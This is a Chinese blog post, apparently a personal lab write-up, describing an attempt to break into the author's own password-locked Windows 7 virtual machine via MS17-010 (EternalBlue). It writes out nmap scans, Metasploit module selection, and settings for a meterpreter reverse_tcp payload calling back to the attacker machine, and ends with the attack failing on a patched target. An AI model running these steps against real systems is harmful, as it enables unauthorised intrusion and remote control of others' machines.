win7忘记密码_通过MS17-010打进去_创建管理员账户

今天用虚拟机的时候发现忘记密码了,服了,打一下,顺便记录一下sb经过。

最后是通过其本身镜像解决,或者用u盘做一个PE

✅第一步:工具准备

  • kali ( msfconsole美少妇

第二步:漏洞扫描

复制代码
nmap -p 445,3389 192.168.200.0/24 -O

本来想用08_067,改用永恒之蓝

第三步: MS17-010

🔎 打开Metasploit控制台

复制代码
msfconsole

🔎查找漏洞模块

复制代码
search eternalblue

👉 推荐选择

  • 第一次打:选择 0

    use exploit/windows/smb/ms17_010_eternalblue //use 0

这是最经典、最直接的永恒之蓝利用方式,最常用。

👉 0 模块打不进去:

  • 选择 1

    use exploit/windows/smb/ms17_010_psexec //use 1

它结合了 SMB 执行与永恒之蓝漏洞,有时能绕过部分系统限制。

👉 只检测:

  • 选择 3

    use auxiliary/scanner/smb/smb_ms17_010 //use 3

检测目标是否存在漏洞

👉 如果目标已经被种下 DoublePulsar 后门:

  • 选择 4

    use exploit/windows/smb/smb_doublepulsar_rce //use 4

利用植入的后门远程执行代码。

最佳顺序推荐(保险打法):

  1. 先用 auxiliary/scanner/smb/smb_ms17_010 扫描确认

  2. exploit/windows/smb/ms17_010_eternalblue

  3. 如果不成功,改用 exploit/windows/smb/ms17_010_psexec

像不正常情况下像我就是知道win7并且开启了445我就直接打了先说

🔎找到后使用

复制代码
use exploit/windows/smb/ms17_010_eternalblue  //use 0

🔎在 Metasploit 中,如果你想查看当前模块有哪些可设置的参数(选项),需要用命令:

设置攻击参数

cs 复制代码
set RHOSTS 192.168.200.128
set LHOST 你的攻击机IP
set LPORT 4444   # 端口随意,一般用 4444
set payload windows/x64/meterpreter/reverse_tcp

⚠ 如果目标系统是 32 位,可以改用:

cs 复制代码
set payload windows/meterpreter/reverse_tcp

查看配置是否正确:

cs 复制代码
show options

发起攻击

cs 复制代码
exploit

打不进去

选系统

还是打不进去

🔎为什么Win7(2009_2025)、开启445,结果却显示"不存在漏洞"?

🔎如何验证 SMBv1 是否真的开启?

可以用 smbclient 工具列出 Windows 共享**:**

cs 复制代码
smbclient -L //192.168.200.128 -N

如果 StateDisabled,那就无法利用永恒之蓝。

如果确认 SMBv1 被禁用,可以尝试:

攻击 SMBv2 协议相关漏洞,如:

  • SMB Signing 绕过

  • MS17-010 失败后可以尝试 ms17_010_psexec (编号1的模块)

cs 复制代码
use exploit/windows/smb/ms17_010_psexec

报错

cs 复制代码
[-] 192.168.200.128:445 - Unable to find accessible named pipe!

|-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 放弃,永恒之蓝(EternalBlue)利用的是 SMBv1 协议的漏洞(MS17-010),如果目标没有开启 SMB 服务(即使开放了 445 端口),那么永恒之蓝也无法成功利用。 #### 关键点: * 445端口开放:端口 445 本身只是 SMB 服务的端口,表示目标机器上可能开放了 SMB 服务,但并不意味着 SMB 服务一定处于可用状态。如果没有启用 SMB 服务,攻击就无法进行。 * SMB 服务:攻击需要依赖 SMB 服务中的"命名管道"来进行漏洞利用。如果目标关闭了 SMB 服务或没有开放可用的命名管道,那么漏洞无法被触发。 总结起来,如果目标没有开启 SMB 服务,即使 445 端口开放,永恒之蓝也无法攻击成功 |

这个win7是打补丁的。

相关推荐
用户962377954481 天前
DVWA 靶场实验报告 (High Level)
安全
数据智能老司机1 天前
用于进攻性网络安全的智能体 AI——在 n8n 中构建你的第一个 AI 工作流
人工智能·安全·agent
数据智能老司机1 天前
用于进攻性网络安全的智能体 AI——智能体 AI 入门
人工智能·安全·agent
用户962377954481 天前
DVWA 靶场实验报告 (Medium Level)
安全
red1giant_star1 天前
S2-067 漏洞复现:Struts2 S2-067 文件上传路径穿越漏洞
安全
用户962377954481 天前
DVWA Weak Session IDs High 的 Cookie dvwaSession 为什么刷新不出来?
安全
cipher3 天前
ERC-4626 通胀攻击:DeFi 金库的"捐款陷阱"
前端·后端·安全
一次旅行6 天前
网络安全总结
安全·web安全
red1giant_star6 天前
手把手教你用Vulhub复现ecshop collection_list-sqli漏洞(附完整POC)
安全
ZeroNews内网穿透6 天前
谷歌封杀OpenClaw背后:本地部署或是出路
运维·服务器·数据库·安全